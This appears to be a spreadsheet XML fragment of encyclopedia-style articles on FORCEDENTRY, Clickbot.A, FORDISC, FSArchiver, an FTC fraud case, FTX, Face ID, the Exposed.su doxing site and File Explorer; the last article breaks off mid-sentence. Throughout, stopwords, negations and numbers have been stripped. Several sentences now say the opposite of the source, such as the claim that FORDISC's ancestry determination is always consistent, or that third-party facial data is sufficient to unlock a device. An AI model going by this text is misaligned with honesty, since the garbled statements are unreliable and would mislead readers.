  <si>
    <t>forcedentry, also capitalized forcedentry, security exploit allegedly developed group deploy pegasus spyware. enables "zero-click" exploit prevalent below, also compromises recent safeguards apple's "blastdoor" later. september 2021, apple released versions operating systems multiple device families containing vulnerability. exploit exploit discovered citizen lab, reported vulnerability used target political dissidents human rights activists. forcedentry appears attack previously detected named "megalodon" amnesty international.the exploit uses files disguised files inject jbig2-encoded data provoke integer overflow apple's coregraphics system, circumventing apple's "blastdoor" sandbox message content, introduced defend kismet, another zero-click exploit. forcedentry exploit given identifier cve-2021-30860. december 2021, google's project zero team published technical breakdown exploit based collaboration apple’s security engineering architecture (sear) group.the exploit described project zero team: jbig2 scripting capabilities, combined vulnerability, ability emulate circuits arbitrary logic gates operating arbitrary memory. build computer architecture script that!? that's exactly exploit does. using 70,000 segment commands defining logical operations, define small computer architecture features registers full 64-bit adder comparator search memory perform arithmetic operations. it's fast javascript, fundamentally computationally equivalent. bootstrapping operations sandbox escape exploit written logic circuit whole thing runs weird, emulated environment created single decompression pass jbig2 stream. it's pretty incredible, time, pretty terrifying. according citizen lab, forcedentry vulnerability exists versions prior 14.8, macos versions prior macos 11.6 security update 2021-005 catalina, watchos versions prior 7.6.2. apple lawsuit november 2021, apple inc. filed complaint group parent company cyber technologies united states district court northern district california relation forcedentry, requesting injunctive relief, compensatory damages, punitive damages, disgorgement profits. also imessage pegasus (spyware) references</t>
  </si>
  <si>
    <t>Clickbot.A</t>
  </si>
  <si>
    <t>clickbot.a botnet used click fraud.the first discovered frantzen sans' internet storm center 2006. time, botnet infected machines. infected population grew 100,000 machines within month. written plugin internet explorer downloaded users. operated using victims' computers automatically click pay-per-click internet advertisements. also used steal passwords unsuspecting users. also references</t>
  </si>
  <si>
    <t>FORDISC</t>
  </si>
  <si>
    <t>before fordisc, many anthropologists based studies museum skeletal collections hamann-todd collection housed case western reserve cleveland, ohio, terry collection housed smithsonian institution washington, these museum collections house skeletal remains amassed years ago. collections, medico-legal context produce accurate determination biological profile. fordisc forensic anthropologists' solution problem, allowed classification measurements available.a 2009 study found even favourable circumstances, fordisc expected classify cent specimens confidence." 2012 research presented 81st annual meeting american association physical anthropologists concluded fordisc ancestry determination always consistent, program perform expectations used caution. software fordisc, interactive discriminant functions program created stephen ousley richard jantz, widely used forensic anthropologists assist creation decedent's biological profile parts cranium available. discriminant function analysis program allows researcher sort individuals specific groups defined certain criteria. program discriminate function analysis "analyzes specific groups known membership discrete categories ancestry, language, sex, tribe ancestry, provides basis classification individuals unknown group membership." program compares potential profiles data contained database skeletal measurements modern humans.using fordisc, decedent’s biological profile created based measurements various areas bones, along information person's age, height, race, illnesses. ancestry, fordisc uses standard anthropometric measurements including maximum length, maximum breadth, bi-zygomatic breadth, orbital breadth height, maximum alveolar breadth width, minimum frontal breadth, basion-bregma, basion-prosthion, cranial base length, bi-auricular breadth, upper facial height breadth, foramen magnum breadth length, frontal chord, parietal chord, occipital chord, nasal height breadth, bi-orbital breadth, interorbital breadth, mastoid length. databases data behind software largely originated forensic data bank, contributed university tennessee contributing institutions. forensic data bank created 1986, national institute justice grant, gathered 3400 cases. forensic data bank currently ongoing effort record information modern populations, primarily forensic cases. fordisc's creators also integrated howells worldwide cranial data program, archaeological remains. howell's craniometric data consist 2500 crania different populations around world dating later holocene, around cranial measurements obtained. uses this software estimate sex, ancestry, stature skeleton unknown identity. this software also used international hearings crime investigations human rights. this method also used fbi, different types criminal cases.although program created forensic anthropology use, many physical anthropologists still using program determine biological profile skeletal remains considered archaeological origin, program archaeological remains produced misclassifications past. william howell’s craniometric data set, published online, made fordisc appealing many physical anthropologists concerned archaeological remains. updates this program continually updated. updated versions created added knowledge acquired. features fordisc improved pictorial guide measurements, improved file management printer control; larger number variables, including postcranial variables; larger numbers groups, including howells' worldwide cranial data. newest version, fordisc interactive forensic software runs windows system. criticism according authors program, limitations taken account using program. some limitations include fact fordisc classify unknown ‘closest’ group, means even individual's ethnic group race represented database, program classify ‘closest’ group. another limitation involves classification using hybrid individuals groups. authors state genetic exchange groups cause misclassifications gene overlap consist ancestral populations. another limitation deal classification individuals nature physical anthropologists ability assess subadults. however, authors state differences subadults different groups, differences tend correspond differences seen adults. another limitation authors believe researchers take account fact program based measurements affected "disease, disuse, treatment, trauma." measurement affected bone(s) produce inaccurate values, therefore classification reflect correct population affinity.the last limitation deals archaeological populations. this limitation measurements data classifications based program remains 20th century, used classification archaeological remains. this documented population differences secular changes occurred throughout history. however, inclusion howells craniometric data allowed researchers classify archaeological remains much data comes individuals 19th century.a 2009 study found fordisc likely useful unidentified specimen less complete belongs populations represented reference samples", even "favorable circumstances expected classify cent specimens confidence."in 2012 research presented 81st annual meeting american association physical anthropologists, concluded fordisc ancestry determination always consistent, programs' recommended acceptance criteria separate correct incorrect determinations. authors concluded program perform expectations used caution. list contributing institutions forensic anthropology data bank appalachian state university c.a. pound human identification laboratory california state university, chico college joseph colorado college faculty dentistry, university paulo hamilton county medical examiner's office, chattanooga, tennessee hamline university honolulu medical examiner's office louisiana state university lucas county coroner's office mercyhurst archaeological institute monterey county sheriff's department jersey state police, criminal investigation bureau north dakota medical examiner north carolina medical examiners office, chapel hill office medical examiner, nashville, tennessee regional forensic center, memphis, tennessee smithsonian institution southwest texas state university texas tech university u.l.m. u.s. army central identification laboratory university alabama university arizona university arkansas, fayetteville university california, santa cruz university hawaii university indianapolis university mexico university south carolina university south florida university utah university wyoming western michigan university wichita state university also forensic anthropology biological anthropology bioarchaeology cranid osteoware references further reading williams, frank l'engle. robert belcher, george armelagos. "forensic misclassification ancient nubian crania: implications assumptions human variation." current anthropology, vol.46, (april 2005), 340–346. external links fordisc website fordisc support forensic anthropology data bank william howell's craniometric data</t>
  </si>
  <si>
    <t>FRISK Software International</t>
  </si>
  <si>
    <t>FSArchiver</t>
  </si>
  <si>
    <t>fsarchiver disk cloning utility linux. fsarchiver save partitions containing different popular file systems disk image. continuation partimage, project authors, implements features partimage lacks. fsarchiver strives feature-rich less partimage. result, used software toolsets functionality. widely used features partimage lacks support multi-core compression support commonly used ext4 filesystem. features windows users, fsarchiver includes experimental support ntfs. fsarchiver supports modern linux file systems ext4, reiser4 btrfs. other notable features include modern multi-threaded compression disk image files, combined file-based images opposed block-based images similar tools use) enhance compression ignoring unused clusters. essential feature fsarchiver "everything checksummed archive order protect data. archive corrupt, lose current file, whole archive." also list disk cloning software references external links official website</t>
  </si>
  <si>
    <t>FTC v. Balls of Kryptonite</t>
  </si>
  <si>
    <t>balls kryptonite enforcement action brought 2009 u.s. federal trade commission (ftc) united states district court central district california. defendant jaivin karnani, southern california man, company balls kryptonite llc, several corporate names business 2011 secured court order barring karnani balls kryptonite engaging many deceptive business practices brought agency's attention.for several years brought case, karnani selling consumer electronic devices cameras, video game systems computer software customers united kingdom. despite physically located california, registered websites british domains, quoted prices pounds sterling took steps suggest business physically located u.k. customers bought merchandise prices quoted, usually significantly lower other, established british retailers, found delivery took cases longer promised hours even though credit cards charged immediately told could cancel orders. many cases, goods received inoperable since never intended sale british european markets, thus protected warranty. complaints u.k.'s office fair trading (oft) ftc's enforcement action. response initial complaint judge dean pregerson issued temporary restraining order barring karnani companies misrepresenting location websites along practices customers complained about. first time brought action american company business exclusively abroad, first action enforcing u.s./eu safe harbor privacy program first uses expanded ability coordinate efforts foreign counterparts safe congress passed several years earlier.the ftc's decision pursue case came criticism. some commentators, thought case title humorous enough make extended references superman comics commentary, questioned whether commission's action retailer deceive american consumers wise limited resources, whether might better prosecute britain. another, course criticizing failings european union's data protection directive came dealing cloud computing, criticize enforcement action showed pointed much work needed done ensuring compliance safe harbor program. background 2006, later alleged, karnani, resident pasadena, california, created companies, best price brands bite size deals llc. registered websites names .co.uk top-level domain, offering consumer electronics cameras, video game systems, computer software. prices given pounds sterling—often considerably charged online retailers.the domain name pound pricing many visitors believe company based united kingdom. british consumers began ordering items site late 2006. many found goods services deficient, even fraudulent.for example, company charged buyers' credit cards purchases immediately, promising delivery within hours. many orders, however, ship weeks. customers called emailed often ignored, persisted and/or supplemented queries complaints better business bureau told delays, item stock, never consented informed prior purchase. when tried cancel orders informed "company policy", made aware prior purchase, allow point.those goods delivered often equally dissatisfied. instructions sometimes spanish chinese, making difficult product. some products shipped plugs internal wiring meant u.s. market, making unusable britain cases, company provide power converter, conceded). even products usable britain turned manufactured sale there, european union (eu) generally, meaning covered manufacturers' warranties.those attempted return products similar resistance website owner, balls kryptonite llc, karnani formed merged companies mid-2007. they variously told time limit refund passed, restocking would deducted it.customers seeking refunds mail products back expense. only learn that, despite domain name, pricing british address given correspondence, company actually located california. this could made liable import taxes customs duties goods.the company state true location websites, "clearly conspicuously" enough offset perception british, later said. this deceit impacts beyond invalidating warranties. meant that, contrary british buyers thought, country's regulations mail-ordered products apply purchases. karnani balls kryptonite also claimed website self-certified compliance u.s.-e.u. safe harbor program protection personal data, fact not. enforcement dissatisfied customers complained britain's office fair trading, handles consumer protection issues. officials touch counterparts u.s. they able take action undertaking spam, spyware, fraud enforcement with enforcers beyond borders 2006, commonly known safe act, congress passed commission's request help coordinate actions internet fraudsters operate across international boundaries similar agencies countries, oft. most relevant case karnani, legislation clarified authority american companies business exclusively customers abroad. action karnani balls kryptonite first undertaken one.in july 2009 commissioners voted proceed complaint; formally filed later month federal court central district california. week later judge dean pregerson issued temporary restraining order barring karnani, balls kryptonite, companies (including incorporated belize) anyone employed misrepresenting company's physical location participation program sponsored third party means delaying orders without giving buyer chance consent delay cancel order also required make corporate financial records available request start companies without notifying attorneys.two years later, karnani settled case consent decree. defendants agreed make prohibitions 2009 order permanent. they barred processing transaction goods ready ship disputing customer chargebacks made prior year decree. $500,000 judgement defendants entered, suspended inability unless business records submitted response ftc's requests found falsified. karnani defendants admitted wrongdoing. analysis commentary weeks consent decree, three lawyers arnold porter commented disposition case firm's consumer-protection blog. ftc's investigation raises interesting question whether foreign consumers become ftc's lois lane, leaving consumers former childhood sweetheart still close friend, lana lang while nothing ftc's mandate requires exclusively protect consumers, could question whether investigation efficient ftc's resources given goods sold market customers targeted allegedly deceptive acts. references superman characters running post, prompted "kryptonite" defendant company's name. "[i]t could also argued would appropriate prosecute metropolis's—or rather, uk's consumer protection laws," observed. "with increasingly commerce conducted internet, likely cross-border fraud similar occurred case become common," concluded. result, tough decisions direct resources, especially given current budget crisis." references</t>
  </si>
  <si>
    <t>FTX (company)</t>
  </si>
  <si>
    <t>bahamian cryptocurrency exchange. incorporated antigua barbuda headquartered bahamas. february 2022, exchange averages billion daily trading volume million users. operates ftx.us, separate exchange available residents. founded purpose generating much wealth possible used charitable causes following earning give principle effective altruism. history graduates bankman-fried gary wang founded 2019. before founding ftx, bankman-fried traded international etfs jane street capital, proprietary trading firm, founded alameda research, quantitative trading firm.in august 2020, acquired blockfolio, cryptocurrency portfolio tracking app, $150 million.in july 2021, raised $900 million billion valuation investors, including softbank, sequoia capital, firms. binance, competitor invested company 2020, divested share 2021.in september 2021, moved headquarters hong kong bahamas.on january 2022, announced billion venture fund named ventures.in january 2022, raised $400 million series funding billion valuation.on february 2022, ftx.us announced company would soon begin offering stock trading customers.in february 2022 reported reportedly creating gaming division help video game developers cryptocurrency, nfts blockchain-related features video games. partnerships april 2021, acquired naming rights miami heat’s basketball stadium 19-year, $135 million deal, fully renaming arena june 2021.on june 2021, announced 10-year, $210 million naming rights deal tsm, esports organization, officially changed name team solomid ftx. june 2021, announced partnership major league baseball (mlb). part deal, logo featured uniforms umpires. june 2021, brady, american football player nfl, became ambassador ftx. part partnership, brady wife gisele bündchen took equity stakes ftx.in august 2021, kevin o'leary signed official spokesperson ftx, paid cryptocurrency managed ftx's platform. also paid $17.5 million naming rights california memorial stadium years.in september 2021, announced long-term partnership mercedes-amg petronas team adds logo cars uniforms lewis hamilton george russell. other brand ambassadors include player stephen curry.in october 2021, ventured cricket signing global deal international cricket council starting world held uae.in 2022, became title sponsor first season home derby home hitting contest staged several international venues. external links ftx.com website ftx.us website ftxtr.com website references</t>
  </si>
  <si>
    <t>Face ID</t>
  </si>
  <si>
    <t>face facial recognition system designed developed apple inc. iphone ipad pro. system allows biometric authentication unlocking device, making payments, accessing sensitive data, providing detailed facial expression tracking animoji, well degrees freedom (6dof) head-tracking, eye-tracking, features. initially released november 2017 iphone since updated introduced several iphone models, ipad models.the face hardware consists sensor three modules; projector projects grid small infrared dots onto user's face, module called flood illuminator shines infrared light face, infrared camera takes infrared picture user, reads resulting pattern generates facial map. this compared registered face using secure subsystem, user authenticated faces match sufficiently. system recognize faces glasses, clothing, makeup, facial hair, adapts changes appearance time. face sparked number debates security privacy. apple claims face statistically advanced touch fingerprint scanning. exhibits significantly fewer false positives. still, face shown issues separating identical twins. multiple security features largely limit risk system bypassed using photos masks, proof-of-concept attempt using detailed scans succeeded. debate continues lack legal protections offered biometric systems compared passcode authentication united states. privacy advocates also expressed concern third-party developers' access "rough maps" user facial data, despite rigid requirements apple developers handle facial data. iphone face unable recognize users wearing face masks. apple responded criticism offering faster fallback passcode input, option apple watch users confirm whether intended unlock iphone. history apple announced face unveiling iphone september 2017. system presented successor touch apple's previous fingerprint-based authentication technology embedded home button iphone earlier devices addition second-generation iphone september 2018, apple introduced iphone faster neural network processing speeds, providing significant speed increase face october 2018, apple introduced third generation ipad pro, brings face ipad allows face recognition orientation. included upgraded version face faster face previous versions. technology face id's technology based primesense's previous work low-cost infrared depth perception basis kinect motion sensor xbox console line microsoft; apple acquired primesense 2013 microsoft started wane kinect.face based facial recognition sensor consists parts: projector module projects 30,000 infrared dots onto user's face, infrared camera module reads pattern. pattern encrypted sent local "secure enclave" device's confirm match registered face. stored facial data mathematical representation details face, inaccessible apple parties. avoid involuntary authentication, system requires user open eyes look device attempt match, although disabled accessibility setting. face temporarily disabled user's passcode required unsuccessful scans, hours inactivity, restarting device, device's side buttons held briefly.apple claimed probability someone else unlocking phone face 1,000,000 opposed touch 50,000. during initial setup, user's face scanned twice number angles create complete reference map. system used, learns typical variations user's appearance, adjust registered face data match aging, facial hair growth, changes using neural engine. system recognize face wearing hats, scarves, glasses, sunglasses, facial hair makeup. also works dark invisibly illuminating whole face dedicated infrared flash module.authentication face used enable number features, including unlocking phone automatically wake, making payments apple pay, viewing saved passwords. apps apple third-party developers protect sensitive data system framework; device verify user's identity return success failure without sharing face data app. additionally, face used without authentication track aspects user's facial expression positioning, used create live effects animoji camera filters. recent years, third party developers developed cases faceid e.g. eyeware beam, provides reliable precise, multi-purpose head eye-tracking tool. used enable control camera angle head motion games eye-tracking share attention audience streams, also augmentative alternative communication (aac) biometric research. devices face iphone iphone iphone iphone iphone iphone iphone iphone mini iphone iphone iphone iphone mini iphone iphone iphone ipad (3rd generation) ipad (4th generation) ipad (5th generation) safety face uses infrared flood illuminator projector, though apple insists output enough cause harm eyes skin, meets 'international safety standards'. they not, however, recommend sensor repaired third parties, citing security concerns. there also inbuilt feature deactivate face unauthorized components found. issues twins close relatives inconsistent results shown testing face identical twins, tests showing system managing separate two, tests failed. system additionally fooled close relatives. apple states probability false match different twins siblings, well children years age, "their distinct facial features fully developed". enforcement access face raised concerns regarding possibility enforcement accessing individual's phone pointing device user's face. united states senator franken asked apple provide information security privacy face announcement, apple responding highlighting recent publication security white paper knowledge base detailing answers.the verge noted courts united states granted different fifth amendment rights united states constitution biometric unlocking systems opposed keycodes. keycodes considered "testimonial" evidence based contents users' thoughts, whereas fingerprints considered physical evidence, suspects ordered unlock phones fingerprint. infiltration many people attempted fool face sophisticated masks, though failed. november 2017, vietnamese security firm bkav announced blog post created $150 mask successfully unlocked face wired noted bkav's technique "proof-of-concept" rather active exploitation risk, technique requiring detailed measurement digital scan iphone owner's face, putting real risk danger targets espionage world leaders. third-party developers user explicitly grants third-party permission camera, also access basic facial expression positioning data face features precise selfie filters seen snapchat, game characters mirroring real-world user facial expressions. data accessible third parties sufficient unlock device even identify user, apple prohibits developers selling data others, creating profiles users, using data advertising. american civil liberties union center democracy technology raised privacy questions apple's enforcement privacy restrictions connected third-party access, apple maintaining store review processes effective safeguards. stanley, senior policy analyst aclu, stated overall idea letting developers access sensitive facial information still satisfactorily handled, stanley telling reuters "the privacy issues around sophisticated facial recognition technology unlocking phone overblown. real privacy issues access third-party developers". face masks during covid-19 pandemic, face masks employed public personal health control measure spread sars-cov-2. face time incompatible face masks, apple stating "face designed work eyes, nose mouth visible." with release 13.5, apple added feature automatically brought passcode screen detected user wearing mask. apple criticized addressing issues release iphone praised lack inclusion face favor touch integration power button fourth-generation ipad air. april 2021, apple released 14.5 watchos option allow apple watch backup face fails face masks. march 2022, apple released 15.4 adds mask-compatible face iphone later devices. also touch structured-light scanner references external links official website</t>
  </si>
  <si>
    <t>Exposed.su</t>
  </si>
  <si>
    <t>exposed.su website russian hackers focused listing personal information celebrities, high-profile figures. among high-profile victims include michelle obama, donald trump, arnold schwarzenegger, kardashian, biden, hillary clinton, beyonce robert mueller. "doxed" documents, hosted website, include social security numbers, credit histories, loan documents mortgage information individuals.the credit history information appears obtained hacking credit history databases, equifax, experian transunion, hacker cosmothegod.in april 2013 brian krebs linked swatting incident coverage site.in 2017, teenager named eric taylor, also known hacker handle cosmothegod, sentenced months united states district court district columbia charges cybercrime regards conspiracy resulted disclosure personal information trump, john brennan, obama, among others website. previously 2016, yorker named islam also arrested federal agents posting director john brennan's confidential information exposed.su "swatting" people including michelle obama robert mueller.the site shut march 2013 jumping domains since mirrored hidden service. references</t>
  </si>
  <si>
    <t>File Explorer</t>
  </si>
  <si>
    <t>file explorer, previously known windows explorer, file manager application included releases microsoft windows operating system windows onwards. provides graphical user interface accessing file systems. also component operating system presents many user interface items screen taskbar desktop. controlling computer possible without windows explorer running (for example, file command task manager nt-derived versions windows function without commands typed command prompt window). overview windows explorer first included windows replacement file manager, came versions windows operating systems. explorer could accessed double-clicking computer desktop icon launched start menu replaced earlier program manager. there also shortcut combination: windows key+e. successive versions windows (and cases, internet explorer) introduced features capabilities, removed features, generally progressed simple file system navigation tool task-based file management system. while "windows explorer" "file explorer" term commonly used describe file management aspect operating system, explorer process also houses operating system's search functionality file type associations (based filename extensions), responsible displaying desktop icons, start menu, taskbar, control panel. collectively, features known windows shell. after user logs explorer process created userinit process. userinit performs initialization user environment (such running login script applying group policies) looks registry shell value creates process system-defined shell default, explorer.exe. then userinit exits. this explorer.exe shown various process explorers parent parent exited. history 1995, microsoft first released test versions shell refresh, named shell technology preview, often referred informally "newshell". update designed replace windows program manager/file manager based shell windows explorer. release provided capabilities quite similar windows "chicago" (codename windows shell late beta phases, however intended nothing test release. there public releases shell technology preview, made available msdn compuserve users: 1995 august 1995. both held windows explorer builds 3.51.1053.1. shell technology preview program never final release 3.51. entire program moved across cairo development group finally integrated shell design code release july 1996. windows windows desktop update with release windows desktop update (packaged internet explorer optional component, included windows 98), windows explorer became "integrated" internet explorer, notably addition navigation arrows (back forward) moving recently visited directories, well internet explorer's favorites menu. address also added windows explorer, user could type directory paths directly, taken folder. another feature based internet explorer technology customized folders. such folders contained hidden page controlled windows explorer displayed contents folder. windows windows 2000 "web-style" folders view, left explorer pane displaying details object currently selected, turned default. certain file types, pictures media files, preview also displayed left pane. windows 2000 explorer featured interactive media player previewer sound video files. however, previewer enabled windows folder customization templates. windows explorer windows 2000 windows allows custom thumbnail previewers tooltip handlers. default file tooltip displays file title, author, subject comments; metadata read special ntfs stream, file ntfs volume, structured storage stream, file structured storage document. microsoft office documents since office make structured storage, metadata displayable windows 2000 explorer default tooltip. file shortcuts also store comments displayed tooltip mouse hovers shortcut. right-hand pane, usually lists files folders, also customized. example, contents system folders displayed default, instead showing right pane warning user modifying contents system folders could harm computer. it's possible define additional explorer panes using elements folder template files. this feature abused computer viruses employed malicious scripts, java applets, activex controls folder template files infection vector. viruses vbs/roor-c vbs.redlof.a.other explorer elements customized include columns "details" view, icon overlays, search providers: dhtml-based search pane integrated windows 2000 explorer, unlike separate search dialog found previous explorer versions.search capabilities added, offering full-text searches documents, options filter date (including arbitrary ranges like "modified within last week"), size, file type. indexing service also integrated operating system search pane built explorer allows searching files indexed database. ability customize standard buttons also added. windows windows server 2003 there significant changes made windows explorer windows visually functionally. microsoft focused especially making explorer discoverable task-based, well adding several features reflect growing computer digital hub. windows explorer windows server 2003 contains features windows task panes search companion disabled default. task pane task pane displayed left-hand side window instead traditional folder tree view. presents user list common actions destinations relevant current directory file(s) selected. instance, directory containing mostly pictures, "picture tasks" shown, offering options display pictures slide show, print out, online order prints. conversely, folder containing music files would offer options play files media player online purchase music. windows media removed sp1. media available windows rtm. every folder also "file folder tasks", offering options create folders, share folder local network, publish files folders website, common tasks like copying, renaming, moving, deleting files folders. file types identified printable also option listed print file. underneath "other places" "details" pane gives additional information typically file size date, depending file type, thumbnail preview, author, image dimensions, details. "folders" button windows explorer toolbar toggles traditional tree view folders, task pane. users task pane restore using sequence: tools folder options general show common tasks/use windows classic folders. search companion microsoft introduced animated "search companions" attempt make searching engaging friendly; default character puppy named rover (previously used microsoft bob), three characters (merlin magician, earl surfer, courtney) also available. these search companions technology microsoft office's office assistants, even incorporating "tricks" sound effects, used office assistants files copied c:\windows\msagent\chars folder.the search capability fairly similar windows windows 2000, major addition: search also instructed search files categorical "documents" "pictures, music video"; feature noteworthy largely windows determines types files classified categories. order maintain relevant list file types, windows explorer connects microsoft downloads files define file types are. search companion disabled favor classic search pane used windows 2000 using tweak applet microsoft's powertoys windows manually editing registry. image handling windows improves image preview explorer offering filmstrip view. "back" "previous" buttons facilitate navigation pictures, pair "rotate" buttons offer 90-degree clockwise counter-clockwise (lossy) rotation images. aside filmstrip view mode, 'thumbnails' mode, displays thumbnail-sized images folder. folder containing images also show thumbnails four images folder overlaid large folder icon. publishing sites offer image hosting services plugged windows explorer, user select images computer, uploaded correctly without dealing comparatively complex solutions involving interfaces. other changes explorer gained ability understand metadata number types files. example, images digital camera, exif information viewed, properties pages photo itself, well optional additional details view columns. tile view mode added, displays file's icon larger size 48), places file name, descriptive type, additional information (typically file size data files, publisher name applications) right. details view also presented additional option called "show groups" allows explorer separate contents headings based field used sort items. taskbar locked prevent accidentally moved. windows explorer also gained ability burn dvd-ram discs windows ability create open files called "compressed folders". ability open cabined (.cab) files. .htm .html file copied moved, accompanying _files suffix folder copied moved among automatically. removed changed features sort order changed compared windows 2000. file names containing numbers windows explorer tries sort based numerical value rather comparing number digit digit. windows vista windows server 2008 search, organizing metadata windows explorer includes significant changes previous versions windows improved filtering, sorting, grouping stacking. combined integrated desktop search, windows explorer allows users find organize files ways, stacks. stacks viewing mode groups files according criterion specified user. stacks clicked filter files shown windows explorer. there also ability save searches virtual folders search folders. search folder simply file, stores query form used windows search subsystem. when accessed, search executed results aggregated presented virtual folder. windows vista includes search folders default: recent documents, recent e-mail, recent music, recent pictures videos, recent changed, "shared me". additionally, search operators properties introduced, kind:music. since least windows comparison operators "greater than" "less than" supported search supported attribute date ranges file sizes, like size:&gt;100mb search files greater 100mb. attributes sortable searchable windows explorer include pictures' dimensions, exif data aperture exposure, video duration framerate width.when sorting items, sort order longer remains consistently ascending descending. each property preferred sort direction. example, sort date defaults descending order, size. name type default ascending order. searching files containing given text string became problematic vista unless files indexed. alternative findstr command-line function. after right-clicking folder open command-line prompt folder. windows explorer also contains modifications visualization files computer. addition windows explorer vista server 2008 details pane, displays metadata information relating currently selected file folder. details pane also display thumbnail file icon filetype file contain visual information. furthermore, different imagery overlaid thumbnails give information file, picture frame around thumbnail image file, filmstrip video file. details pane also allows change textual metadata author title files support within windows explorer. type metadata called tags allows users descriptive terms documents easier categorization retrieval. some files support open metadata, allowing users define types metadata files. out-of-the-box, windows vista windows server 2008 supports microsoft office documents audio video files. support file types however added writing specialized software retrieve metadata shell's request. metadata stored file's alternate data stream ntfs volumes cannot viewed edited summary file's properties anymore. instead, metadata stored inside file, always travel file dependent file system. layout icons windows explorer windows vista windows server 2008 also introduces layout. task panes windows replaced toolbar navigation pane left. navigation pane contains commonly accessed folders preconfigured search folders. eight different views available view files folders, including extra large, large, medium, small, list, details, tiles, content. addition, column headers appear icon viewing modes, unlike windows appear details icon viewing mode. file folder actions cut, copy, paste, undo, redo, delete, rename properties built dropdown menu appears organize button clicked. also possible change layout explorer window using organize button. users select whether display classic menus, search pane, preview pane, reading pane, navigation pane. preview pane enables users preview files (e.g., documents media files) without opening them. application, office 2007, installs preview handlers file types, files also edited within preview pane itself.windows vista introduction breadcrumb easier navigation. opposed prior address displayed current folder simple editable combobox, style structures path clickable levels folder hierarchy (though falls back classic edit mode blank area clicked), enabling user skip many levels desired click rather repeatedly clicking "up". also possible navigate subfolder current folder using arrow right last item. menu hidden default reappears temporarily user presses alt. check boxes windows explorer allow selection multiple files. free used space drives shown horizontal indicator bars. icons various sizes supported: 256. windows explorer zoom icons using slider holding ctrl using mouse scrollwheel. live icons display content folders files rather generic icons. other changes with release windows vista server 2008 windows internet explorer windows internet explorer longer integrated windows explorer. windows vista server 2008 (and windows well installed), windows explorer longer displays pages, support file manager, although separately launch necessary. when moving copying files folder another, files name, option available rename file; previous versions windows, user prompted choose either replacement cancel moving file. also, renaming file, explorer highlights filename without selecting extension. renaming multiple files quicker pressing automatically renames existing file folder opens file name text field next file renaming. shift+tab allows renaming manner upwards. support burning data dvds (dvd±r, dvd±r dvd±r addition dvd-ram using version image mastering api, well live file system support added.if file another application, windows explorer tells users close application retry file operation. also, interface ifileisinuse introduced developers applications switch main window application file open simply close file "file use" dialog. running application exposes operations means ifileisinuse interface, windows explorer, upon encountering locked file, allows user close file switch application dialog itself.windows vista introduced precluded support media transfer protocol. removed changed features ability customize layout buttons toolbars removed windows vista's explorer, ability password file (compressed folder). toolbar button explorer folder current folder removed (the function still exists however, move folder pressing although still fully available menus keyboard shortcuts, toolbar buttons cut, copy, paste, undo, delete, properties others longer available. menu also hidden default still available pressing changing visibility layout options. several features removed showing size status without selecting items, storing metadata ntfs alternate data streams, icolumnprovider interface allowed addition custom columns explorer folder background customization using desktop.ini. option "managing pairs pages folders" also removed, user telling vista .html file folder name created saving complete page treated separately, cannot delete folder without deleting html file well.the ability right-click folder "search" removed windows vista service pack users must open folder wish search enter keywords search field located right corner window. alternatively, users specify search parameters "advanced search" accessed clicking organize selecting search pane layout submenu. pressing also opens "advanced search" interface. windows windows server 2008 libraries windows explorer windows windows server 2008 supports libraries, virtual folders described .library-ms file aggregates content various locations including shared folders networked systems shared folder indexed host system present unified view. searching library automatically federates query remote systems, addition searching local system, files remote systems also searched. unlike search folders, libraries backed physical location allows files saved libraries. such files transparently saved backing physical folder. default save location library configured user, default view layout library. libraries generally stored libraries special folder, allows displayed navigation pane. default, user account windows contains four libraries, different file types: documents, music, pictures, videos. they configured include user's profile folders respective file types, well computer's corresponding public folders. addition aggregating multiple storage locations, libraries enable arrangement views search filter suggestions. arrangement views allow users pivot views library's contents based metadata. example, selecting month" view pictures library display photos stacks, stack represents month photos based date taken. music library, artist" view display stacks albums artists collections, browsing artist stack display relevant albums. search filter suggestions feature windows windows server 2008 explorer's search box. when user clicks search box, menu shows showing recent searches well suggested advanced query syntax filters user type. when selected typed manually), menu update show possible values filter property, list based current location parts query already typed. example, selecting "tags" filter typing "tags:" search display list possible values return search results. metadata written within file, implemented vista, also utilized windows this sometimes lead long wait times displaying contents folder. example, folder contains many large video files totaling hundreds gigabytes, window explorer pane details view mode showing property contained within metadata (for example date, length, frame height), windows explorer might search contents whole file meta data. some damaged files cause prolonged delay well. this metadata information able placed anywhere within file, beginning, middle, end, necessitating search whole file. lengthy delays also occur displaying contents folder many different types program icons. icon contained metadata. some programs cause activation virus scan retrieving icon information metadata, hence producing lengthy delay.arrangement views search filter suggestions database-backed features require locations library indexed windows search service. local disk locations must indexed local indexer, windows explorer automatically locations indexing scope included library. remote locations indexed indexer another windows windows server 2008 machine, windows machine running windows search (such windows vista windows home server), another device implements ms-wsp remote query protocol. federated search windows explorer also supports federating search external data sources, custom databases services, exposed described opensearch definition. federated location description (called search connector) provided .osdx file. once installed, data source becomes queryable directly windows explorer. windows explorer features, previews thumbnails, work results federated search well. other changes windows windows server 2008 support showing icons context menu creating cascaded context menus static verbs submenus using registry instead shell extension. search explorer window address resized. certain folders navigation pane hidden reduce clutter. progress bars overlay icons application's button taskbar. content view shows thumbnails metadata. buttons toggle preview pane create folder. removed changed features windows several features removed windows explorer, including collapsible folder pane, overlay icon shared items, remembering individual folder window sizes positions, free disk space status bar, icons command bar, ability disable auto arrange align grid, sortable column headings views except details view, ability disable full selection details view, automatic horizontal scrolling scrollbar navigation pane maintaining selection sorting edit menu. windows windows server 2012 file manager windows windows server 2012 renamed file explorer introduces features redesigned interface incorporating ribbon toolbar, redesigned file operation dialog displays detailed progress allows file operations paused resumed. details pane windows vista removed replaced narrower pane icons fewer detail columns. details displayed hovering file's name. windows windows server 2016 icons file explorer redesigned. they flatter simpler design. window border padding thinner previous versions. windows creators update later versions come universal file explorer (also known file explorer). although hidden, opened creating shortcut pointing "explorer shell:appsfolder\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy!app" windows version 1809 windows server 2019 "dark mode" added file explorer windows version 1809 windows server 2019. universal file explorer also includes features. windows version 1909 windows search onedrive integrated file explorer's search feature windows version 1909. windows windows file explorer undergone significant changes ribbon interface simplified command bar. translucency, shadows, rounded geometry also added, following fluent design system. march 2022, microsoft introduced adverts file explorer, later stated 'not intended published externally' significant negative media coverage. april 2022, microsoft announced would adding tabs, favorites, homepage file explorer. extensibility file explorer extended support non-default functionality means windows shell extensions, objects plug extended functionality windows explorer. shell extensions form shell extension handlers, toolbars even namespace extensions allow certain folders even non-filesystem objects images scanned scanner) presented special folder. file explorer also allows metadata files added ntfs alternate data streams, separate data stream file. shell extension handlers queried shell beforehand modifying action shell takes. they associated file type show particular action 